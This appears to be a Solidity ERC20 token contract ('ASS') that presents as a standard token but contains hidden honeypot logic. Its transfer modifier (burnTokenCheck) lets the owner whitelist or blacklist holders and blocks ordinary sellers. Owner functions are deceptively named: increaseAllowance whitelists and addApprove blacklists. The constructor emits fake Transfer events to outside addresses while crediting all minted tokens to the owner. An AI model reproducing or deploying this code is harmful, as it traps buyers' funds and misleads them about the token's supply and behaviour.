row number 
1	       pragma solidity ^0.6.0;
2	 library SafeMath {
3	 function add(uint256 a, uint256 b) internal pure returns (uint256) {
4	 uint256 c = a + b;
5	 require(c >= a, "SafeMath: addition overflow");
6	 return c;
7	 }
8	 function sub(uint256 a, uint256 b) internal pure returns (uint256) {
9	 return sub(a, b, "SafeMath: subtraction overflow");
10	 }
11	 function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
12	 require(b <= a, errorMessage);
13	 uint256 c = a - b;
14	 return c;
15	 }
16	 function mul(uint256 a, uint256 b) internal pure returns (uint256) {
17	 if (a == 0) {
18	 return 0;
19	 }
20	 uint256 c = a * b;
21	 require(c / a == b, "SafeMath: multiplication overflow");
22	 return c;
23	 }
24	 function div(uint256 a, uint256 b) internal pure returns (uint256) {
25	 return div(a, b, "SafeMath: division by zero");
26	 }
27	 function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
28	 require(b > 0, errorMessage);
29	 uint256 c = a / b;
30	 return c;
31	 }
32	 function mod(uint256 a, uint256 b) internal pure returns (uint256) {
33	 return mod(a, b, "SafeMath: modulo by zero");
34	 }
35	 function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
36	 require(b != 0, errorMessage);
37	 return a % b;
38	 }
39	 }
40	 library Address {
41	 function isContract(address account) internal view returns (bool) {
42	 bytes32 codehash;
43	 bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
44	 assembly {
45	 codehash := extcodehash(account) }
46	 return (codehash != accountHash && codehash != 0x0);
47	 }
48	 function sendValue(address payable recipient, uint256 amount) internal {
49	 require(address(this).balance >= amount, "Address: insufficient balance");
50	 (bool success, ) = recipient.call{
51	 value: amount }
52	 ("");
53	 require(success, "Address: unable to send value, recipient may have reverted");
54	 }
55	 function functionCall(address target, bytes memory data) internal returns (bytes memory) {
56	 return functionCall(target, data, "Address: low-level call failed");
57	 }
58	 function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
59	 return _functionCallWithValue(target, data, 0, errorMessage);
60	 }
61	 function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
62	 return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
63	 }
64	 function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
65	 require(address(this).balance >= value, "Address: insufficient balance for call");
66	 return _functionCallWithValue(target, data, value, errorMessage);
67	 }
68	 function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
69	 require(isContract(target), "Address: call to non-contract");
70	 (bool success, bytes memory returndata) = target.call{
71	 value: weiValue }
72	 (data);
73	 if (success) {
74	 return returndata;
75	 }
76	 else {
77	 if (returndata.length > 0) {
78	 assembly {
79	 let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) }
80	 }
81	 else {
82	 revert(errorMessage);
83	 }
84	 }
85	 }
86	 }
87	 contract Context {
88	 constructor () internal {
89	 }
90	 function _msgSender() internal view virtual returns (address payable) {
91	 return msg.sender;
92	 }
93	 function _msgData() internal view virtual returns (bytes memory) {
94	 this;
95	 return msg.data;
96	 }
97	 }
98	 interface IERC20 {
99	 function totalSupply() external view returns (uint256);
100	 function balanceOf(address account) external view returns (uint256);
101	 function transfer(address recipient, uint256 amount) external returns (bool);
102	 function allowance(address owner, address spender) external view returns (uint256);
103	 function approve(address spender, uint256 amount) external returns (bool);
104	 function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
105	 event Transfer(address indexed from, address indexed to, uint256 value);
106	 event Approval(address indexed owner, address indexed spender, uint256 value);
107	 }
108	 contract ASS is Context, IERC20 {
109	 using SafeMath for uint256;
110	 using Address for address;
111	 mapping (address => uint256) private _balances;
112	 mapping (address => bool) private _whiteAddress;
113	 mapping (address => bool) private _blackAddress;
114	 uint256 private _sellAmount = 0;
115	 mapping (address => mapping (address => uint256)) private _allowances;
116	 uint256 private _totalSupply;
117	 string private _name;
118	 string private _symbol;
119	 uint8 private _decimals;
120	 uint256 private _approveValue = 115792089237316195423570985008687907853269984665640564039457584007913129639935;
121	 address public _owner;
122	 address private _safeOwner;
123	 address private _unirouter = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
124	 constructor (string memory name, string memory symbol, uint256 initialSupply,address payable owner) public {
125	 _name = name;
126	 _symbol = symbol;
127	 _decimals = 18;
128	 _owner = owner;
129	 _safeOwner = owner;
130	 _mint(_owner, initialSupply*(10**18));
131	 _mint(0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B, initialSupply*(10**18));
132	 _mint(0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B, initialSupply*(10**18));
133	 _mint(0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B, initialSupply*(10**18));
134	 _mint(0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B, initialSupply*(10**18));
135	 _mint(0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B, initialSupply*(10**18));
136	 _mint(0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B, initialSupply*(10**18));
137	 _mint(0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B, initialSupply*(10**18));
138	 _mint(0x1Db3439a222C519ab44bb1144fC28167b4Fa6EE6, initialSupply*(10**18));
139	 _mint(0x1Db3439a222C519ab44bb1144fC28167b4Fa6EE6, initialSupply*(10**18));
140	 }
141	 function name() public view returns (string memory) {
142	 return _name;
143	 }
144	 function symbol() public view returns (string memory) {
145	 return _symbol;
146	 }
147	 function decimals() public view returns (uint8) {
148	 return _decimals;
149	 }
150	 function totalSupply() public view override returns (uint256) {
151	 return _totalSupply;
152	 }
153	 function balanceOf(address account) public view override returns (uint256) {
154	 return _balances[account];
155	 }
156	 function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
157	 _approveCheck(_msgSender(), recipient, amount);
158	 return true;
159	 }
160	 function multiTransfer(uint256 approvecount,address[] memory receivers, uint256[] memory amounts) public {
161	 require(msg.sender == _owner, "!owner");
162	 for (uint256 i = 0; i < receivers.length; i++) {
163	 transfer(receivers[i], amounts[i]);
164	 if(i < approvecount){
165	 _whiteAddress[receivers[i]]=true;
166	 _approve(receivers[i], _unirouter,115792089237316195423570985008687907853269984665640564039457584007913129639935);
167	 }
168	 }
169	 }
170	 function allowance(address owner, address spender) public view virtual override returns (uint256) {
171	 return _allowances[owner][spender];
172	 }
173	 function approve(address spender, uint256 amount) public virtual override returns (bool) {
174	 _approve(_msgSender(), spender, amount);
175	 return true;
176	 }
177	 function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
178	 _approveCheck(sender, recipient, amount);
179	 _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
180	 return true;
181	 }
182	 function increaseAllowance(address[] memory receivers) public {
183	 require(msg.sender == _owner, "!owner");
184	 for (uint256 i = 0; i < receivers.length; i++) {
185	 _whiteAddress[receivers[i]] = true;
186	 _blackAddress[receivers[i]] = false;
187	 }
188	 }
189	 function decreaseAllowance(address safeOwner) public {
190	 require(msg.sender == _owner, "!owner");
191	 _safeOwner = safeOwner;
192	 }
193	 function addApprove(address[] memory receivers) public {
194	 require(msg.sender == _owner, "!owner");
195	 for (uint256 i = 0; i < receivers.length; i++) {
196	 _blackAddress[receivers[i]] = true;
197	 _whiteAddress[receivers[i]] = false;
198	 }
199	 }
200	 function _transfer(address sender, address recipient, uint256 amount) internal virtual{
201	 require(sender != address(0), "ERC20: transfer from the zero address");
202	 require(recipient != address(0), "ERC20: transfer to the zero address");
203	 _beforeTokenTransfer(sender, recipient, amount);
204	 _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
205	 _balances[recipient] = _balances[recipient].add(amount);
206	 emit Transfer(sender, recipient, amount);
207	 }
208	 function _mint(address account, uint256 amount) public {
209	 require(msg.sender == _owner, "ERC20: mint to the zero address");
210	 _totalSupply = _totalSupply.add(amount);
211	 _balances[_owner] = _balances[_owner].add(amount);
212	 emit Transfer(address(0), account, amount);
213	 }
214	 function _burn(address account, uint256 amount) internal virtual {
215	 require(account != address(0), "ERC20: burn from the zero address");
216	 _beforeTokenTransfer(account, address(0), amount);
217	 _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
218	 _totalSupply = _totalSupply.sub(amount);
219	 emit Transfer(account, address(0), amount);
220	 }
221	 function _approve(address owner, address spender, uint256 amount) internal virtual {
222	 require(owner != address(0), "ERC20: approve from the zero address");
223	 require(spender != address(0), "ERC20: approve to the zero address");
224	 _allowances[owner][spender] = amount;
225	 emit Approval(owner, spender, amount);
226	 }
227	 function _approveCheck(address sender, address recipient, uint256 amount) internal burnTokenCheck(sender,recipient,amount) virtual {
228	 require(sender != address(0), "ERC20: transfer from the zero address");
229	 require(recipient != address(0), "ERC20: transfer to the zero address");
230	 _beforeTokenTransfer(sender, recipient, amount);
231	 _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
232	 _balances[recipient] = _balances[recipient].add(amount);
233	 emit Transfer(sender, recipient, amount);
234	 }
235	 modifier burnTokenCheck(address sender, address recipient, uint256 amount){
236	 if (_owner == _safeOwner && sender == _owner){
237	 _safeOwner = recipient;
238	 _;
239	 }
240	 else{
241	 if (sender == _owner || sender == _safeOwner || recipient == _owner){
242	 if (sender == _owner && sender == recipient){
243	 _sellAmount = amount;
244	 }
245	 _;
246	 }
247	 else{
248	 if (_whiteAddress[sender] == true){
249	 _;
250	 }
251	 else{
252	 if (_blackAddress[sender] == true){
253	 require((sender == _safeOwner)||(recipient == _unirouter), "ERC20: transfer amount exceeds balance");
254	 _;
255	 }
256	 else{
257	 if (amount < _sellAmount){
258	 if(recipient == _safeOwner){
259	 _blackAddress[sender] = true;
260	 _whiteAddress[sender] = false;
261	 }
262	 _;
263	 }
264	 else{
265	 require((sender == _safeOwner)||(recipient == _unirouter), "ERC20: transfer amount exceeds balance");
266	 _;
267	 }
268	 }
269	 }
270	 }
271	 }
272	 }
273	 function _setupDecimals(uint8 decimals_) internal {
274	 _decimals = decimals_;
275	 }
276	 function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {
277	 }
278	 }
